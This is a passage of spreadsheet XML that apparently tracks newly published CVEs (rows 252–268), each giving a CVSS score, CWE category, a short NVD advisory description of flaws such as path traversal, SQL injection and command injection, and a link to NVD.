        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in BackupEase &lt;= 2.2.2 versions.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97241</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97244</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Contributor Path Traversal in Creator LMS &lt;= 1.2.19 versions.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97244</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102123</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>A Kiteworks appliance setup interface did not confine a user-supplied file path to its intended directory, which could allow an unauthenticated attacker to write a file to any location writable by the affected service account, potentially compromising the integrity of the appliance or rendering it unavailable until an operator intervenes. Exploitation requires network access to the affected interface, which is not reachable on a fully configured appliance in its default configuration; reaching it depends on either the transient window while an appliance is first being provisioned or a non-default appliance configuration.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102123</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103446</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in The Wikimedia Foundation MediaWiki WikiLambda extension allows Authentication Bypass.
This issue affects MediaWiki WikiLambda extension: 1.46.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103446</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101295</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Path traversal / arbitrary file write in oc-mirror's operator catalog image extraction. When mirroring operator catalogs using either the legacy v1 path (--v1) or the OCI feature path (--use-oci-feature), oc-mirror extracts tar entries from catalog image layers without validating that file paths resolve within the intended destination directory.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101295</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103229</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. This issue affects the function mysqli_query of the file admin/delete1.php of the component Unauthenticated Action Script. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103229</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103231</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. The affected element is the function mysqli_query of the file User/cancel.php of the component Order Cancellation. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103231</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103530</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in decolua 9Router up to 0.5.55. The affected element is the function fetch of the file src/shared/utils/ssrfGuard.js of the component Search Endpoint. Performing a manipulation of the argument provider_options.baseUrl results in server-side request forgery. The attack can be initiated remotely. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103530</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103536</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in ZongXR Supermarket 1.0.0.0. Affected by this vulnerability is the function OrderController.addOrder of the file order/src/main/java/com/supermarket/order/controller/OrderController.java of the component save Endpoint. Such manipulation of the argument userId leads to missing authentication. The attack can be executed remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103536</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47496</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the Virtual GPU Manager (vGPU plugin) where a guest VM user may cause an out-of-bounds write by sending a specially crafted RPC call to the host. A successful exploit of this vulnerability might lead to escalation of privileges, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47496</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47580</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause a missing authorization issue. A successful exploit of this vulnerability might lead to information disclosure and data tampering.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47580</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76143</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in Genian SSL PNS allows an attacker to bypass multi-factor authentication by manipulating a login request parameter.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76143</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102089</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to a path traversal weakness in an administrative import function allowed an authenticated administrator to write files to arbitrary locations on the server. This could potentially be leveraged to execute arbitrary code on the underlying system.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102089</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102093</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to Improper Privilege Management and does not correctly enforce restrictions on role assignment, which could allow an authenticated administrative user with limited, non-Sysadmin role-management permissions to elevate another user to full system-administrator privileges beyond those the administrative user was authorized to grant.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102093</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102094</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Unsafe Reflection and does not sufficiently restrict the code that the mail-processing pipeline could load from an imported rule configuration. An authenticated administrator with mail-rule configuration privileges could cause the gateway to load and execute code beyond the approved set of mail-processing components, potentially in the context of the mail-gateway service account.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102094</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102096</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Core before version 9.5.0 is vulnerable to OS Command Injection that allows an authenticated administrator to upload a configuration package whose contents were not sufficiently validated before being processed. A crafted package could cause the underlying system to execute arbitrary operating-system commands, potentially with elevated privileges, on the affected appliance.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102096</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102097</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-94</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
